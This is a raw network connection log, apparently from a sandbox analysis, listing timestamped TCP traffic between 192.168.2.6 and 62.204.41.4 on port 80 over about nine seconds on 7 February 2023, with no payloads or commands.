                          Feb 7, 2023 20:02:11.583328009 CET5000380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:11.642307043 CET805000262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:11.642465115 CET5000280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:11.644890070 CET805000362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:11.645056009 CET5000380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:11.648731947 CET5000380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:11.710114956 CET805000362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:11.713573933 CET805000362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:11.713639975 CET5000380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:11.829682112 CET5000380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:11.830795050 CET5000480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:11.891268015 CET805000362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:11.891443968 CET5000380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:11.893125057 CET805000462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:11.893275976 CET5000480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:11.893867016 CET5000480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:11.956197023 CET805000462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:11.959650040 CET805000462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:11.959785938 CET5000480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:12.084789991 CET5000480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:12.085776091 CET5000580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:12.147455931 CET805000462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:12.147572041 CET5000480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:12.148303032 CET805000562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:12.148458958 CET5000580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:12.152879953 CET5000580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:12.215421915 CET805000562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:12.220577955 CET805000562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:12.220755100 CET5000580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:12.336905003 CET5000580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:12.337918997 CET5000680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:12.399091959 CET805000662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:12.399363995 CET5000680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:12.399403095 CET805000562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:12.399507046 CET5000580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:12.401268005 CET5000680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:12.462580919 CET805000662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:12.465497971 CET805000662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:12.465626955 CET5000680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:12.589353085 CET5000680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:12.600514889 CET5000780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:12.651556015 CET805000662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:12.651789904 CET5000680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:12.661144972 CET805000762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:12.661467075 CET5000780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:12.669390917 CET5000780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:12.729886055 CET805000762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:12.732749939 CET805000762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:12.732898951 CET5000780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:12.855262995 CET5000780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:12.856131077 CET5000880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:12.915704966 CET805000762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:12.915883064 CET5000780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:12.916553020 CET805000862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:12.916706085 CET5000880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:12.917279959 CET5000880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:12.977670908 CET805000862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:12.980612993 CET805000862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:12.980762959 CET5000880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:13.096560001 CET5000880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:13.097585917 CET5000980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:13.157126904 CET805000862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:13.159883022 CET805000962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:13.160008907 CET5000880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:13.160074949 CET5000980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:13.165565968 CET5000980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:13.227823973 CET805000962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:13.231556892 CET805000962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:13.232713938 CET5000980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:13.345664978 CET5000980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:13.347245932 CET5001080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:13.409694910 CET805000962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:13.409787893 CET805001062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:13.409915924 CET5000980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:13.409996033 CET5001080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:13.422324896 CET5001080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:13.483872890 CET805001062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:13.486661911 CET805001062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:13.487055063 CET5001080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:13.596334934 CET5001080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:13.597347021 CET5001180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:13.657903910 CET805001062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:13.658142090 CET5001080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:13.659773111 CET805001162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:13.659991026 CET5001180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:13.661822081 CET5001180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:13.724386930 CET805001162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:13.727159977 CET805001162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:13.730601072 CET5001180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:13.877016068 CET5001180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:13.878074884 CET5001280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:13.940762997 CET805001162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:13.940969944 CET5001180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:13.941708088 CET805001262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:13.941870928 CET5001280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:13.968224049 CET5001280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:14.030725956 CET805001262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:14.033350945 CET805001262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:14.033581972 CET5001280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:14.141998053 CET5001280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:14.143326044 CET5001380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:14.204557896 CET805001262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:14.204642057 CET805001362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:14.204708099 CET5001280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:14.204792976 CET5001380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:14.205368042 CET5001380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:14.266896963 CET805001362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:14.271131992 CET805001362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:14.271266937 CET5001380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:14.376477003 CET5001380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:14.378318071 CET5001480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:14.438118935 CET805001362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:14.438220024 CET5001380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:14.438738108 CET805001462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:14.438874960 CET5001480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:14.441730022 CET5001480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:14.502202034 CET805001462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:14.504437923 CET805001462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:14.504518032 CET5001480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:14.611212969 CET5001480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:14.612308979 CET5001580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:14.671813965 CET805001462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:14.672025919 CET5001480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:14.675795078 CET805001562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:14.676064014 CET5001580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:14.676485062 CET5001580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:14.740422964 CET805001562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:14.743518114 CET805001562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:14.743623018 CET5001580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:14.863344908 CET5001580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:14.883249044 CET5001680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:14.925957918 CET805001562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:14.926193953 CET5001580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:14.944977999 CET805001662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:14.945251942 CET5001680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:14.953403950 CET5001680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.015166044 CET805001662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:15.018220901 CET805001662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:15.018441916 CET5001680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.126646042 CET5001680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.127789974 CET5001780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.188549042 CET805001662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:15.188774109 CET5001680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.190042973 CET805001762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:15.190294027 CET5001780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.190910101 CET5001780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.255089998 CET805001762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:15.258924961 CET805001762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:15.259375095 CET5001780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.388442993 CET5001780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.389533043 CET5001880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.451380968 CET805001762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:15.451572895 CET5001780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.451700926 CET805001862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:15.451838970 CET5001880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.452445030 CET5001880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.514802933 CET805001862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:15.518418074 CET805001862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:15.518616915 CET5001880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.626322985 CET5001880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.627332926 CET5001980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.688186884 CET805001862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:15.688347101 CET5001880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.688642979 CET805001962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:15.688774109 CET5001980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.689584017 CET5001980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.750861883 CET805001962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:15.753391027 CET805001962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:15.753555059 CET5001980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.860732079 CET5001980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.861867905 CET5002080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.922209978 CET805001962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:15.922394991 CET5001980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.922966003 CET805002062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:15.923122883 CET5002080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.924236059 CET5002080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:15.985414982 CET805002062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:15.988842010 CET805002062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:15.989061117 CET5002080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:16.094635010 CET5002080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:16.095652103 CET5002180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:16.156017065 CET805002062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:16.156249046 CET5002080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:16.156975985 CET805002162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:16.157133102 CET5002180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:16.175025940 CET5002180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:16.236737967 CET805002162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:16.240391970 CET805002162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:16.240502119 CET5002180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:16.368966103 CET5002180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:16.380697966 CET5002280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:16.430825949 CET805002162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:16.430939913 CET5002180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:16.441056967 CET805002262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:16.441181898 CET5002280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:16.443010092 CET5002280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:16.503371954 CET805002262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:16.506484032 CET805002262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:16.506597996 CET5002280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:16.615786076 CET5002280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:16.616754055 CET5002380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:16.676146984 CET805002262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:16.676318884 CET5002280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:16.678339958 CET805002362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:16.678488970 CET5002380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:16.679938078 CET5002380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:16.741508961 CET805002362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:16.744438887 CET805002362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:16.744544983 CET5002380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:16.862083912 CET5002380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:16.862945080 CET5002480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:16.922454119 CET805002462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:16.922558069 CET5002480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:16.923135042 CET5002480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:16.923547983 CET805002362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:16.923624992 CET5002380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:16.982533932 CET805002462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:16.985208035 CET805002462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:16.985352993 CET5002480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:17.099250078 CET5002480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:17.102034092 CET5002580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:17.158674955 CET805002462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:17.158830881 CET5002480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:17.163294077 CET805002562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:17.163494110 CET5002580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:17.165507078 CET5002580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:17.226999044 CET805002562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:17.231359959 CET805002562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:17.231462955 CET5002580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:17.345791101 CET5002580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:17.346776962 CET5002680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:17.407134056 CET805002562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:17.407351971 CET5002580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:17.407354116 CET805002662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:17.407484055 CET5002680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:17.408057928 CET5002680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:17.468544960 CET805002662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:17.471838951 CET805002662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:17.473965883 CET5002680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:17.595068932 CET5002680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:17.595957994 CET5002780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:17.655814886 CET805002662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:17.656157970 CET805002762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:17.656402111 CET5002680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:17.656476021 CET5002780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:17.657150984 CET5002780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:17.717500925 CET805002762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:17.719563007 CET805002762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:17.722738981 CET5002780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:17.830508947 CET5002780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:17.831681013 CET5002880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:17.890925884 CET805002762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:17.891089916 CET5002780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:17.893309116 CET805002862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:17.894993067 CET5002880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:17.895695925 CET5002880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:17.957195044 CET805002862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:17.959394932 CET805002862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:17.959647894 CET5002880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:18.063605070 CET5002880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:18.064488888 CET5002980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:18.125245094 CET805002862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:18.125459909 CET5002880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:18.126715899 CET805002962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:18.126945019 CET5002980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:18.139693022 CET5002980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:18.202076912 CET805002962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:18.205637932 CET805002962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:18.205746889 CET5002980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:18.318736076 CET5002980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:18.319931030 CET5003080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:18.381918907 CET805002962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:18.382160902 CET5002980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:18.383668900 CET805003062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:18.383848906 CET5003080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:18.384403944 CET5003080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:18.446822882 CET805003062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:18.449120998 CET805003062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:18.449314117 CET5003080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:18.574053049 CET5003080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:18.574760914 CET5003180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:18.636487007 CET805003062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:18.636718035 CET5003080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:18.636838913 CET805003162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:18.637026072 CET5003180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:18.637614012 CET5003180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:18.699752092 CET805003162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:18.702125072 CET805003162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:18.702342987 CET5003180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:18.816055059 CET5003180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:18.816893101 CET5003280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:18.878264904 CET805003162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:18.878293991 CET805003262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:18.878367901 CET5003180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:18.878438950 CET5003280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:18.890388012 CET5003280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:18.951946020 CET805003262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:18.954585075 CET805003262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:18.954770088 CET5003280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:19.064347029 CET5003280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:19.065606117 CET5003380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:19.125822067 CET805003262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:19.125972033 CET5003280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:19.126996040 CET805003362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:19.127123117 CET5003380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:19.127548933 CET5003380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:19.189043999 CET805003362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:19.192739964 CET805003362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:19.192845106 CET5003380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:19.299060106 CET5003380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:19.300187111 CET5003480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:19.360714912 CET805003362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:19.360811949 CET5003380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:19.361675024 CET805003462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:19.361805916 CET5003480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:19.362339020 CET5003480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:19.423768997 CET805003462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:19.426523924 CET805003462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:19.426646948 CET5003480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:19.548584938 CET5003480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:19.549354076 CET5003580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:19.609679937 CET805003562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:19.609841108 CET5003580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:19.610126972 CET805003462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:19.610197067 CET5003480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:19.615797997 CET5003580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:19.676414967 CET805003562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:19.678596020 CET805003562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:19.678673029 CET5003580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:19.783078909 CET5003580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:19.783874989 CET5003680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:19.843595028 CET805003562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:19.843712091 CET5003580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:19.845199108 CET805003662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:19.845339060 CET5003680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:19.847585917 CET5003680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:19.908915043 CET805003662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:19.911933899 CET805003662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:19.912079096 CET5003680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:20.022578001 CET5003680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:20.023897886 CET5003780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:20.084079981 CET805003662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:20.084222078 CET5003680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:20.084326029 CET805003762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:20.084448099 CET5003780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:20.092570066 CET5003780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:20.153163910 CET805003762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:20.157129049 CET805003762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:20.157248020 CET5003780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:20.274199009 CET5003780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:20.275207043 CET5003880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:20.334857941 CET805003762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:20.334985018 CET5003780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:20.335766077 CET805003862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:20.335901022 CET5003880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:20.336643934 CET5003880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:20.397022963 CET805003862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:20.399569988 CET805003862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:20.399643898 CET5003880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:20.520885944 CET5003880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:20.521625996 CET5003980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:20.581456900 CET805003862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:20.581634998 CET5003880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:20.581808090 CET805003962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:20.581903934 CET5003980192.168.2.662.204.41.4
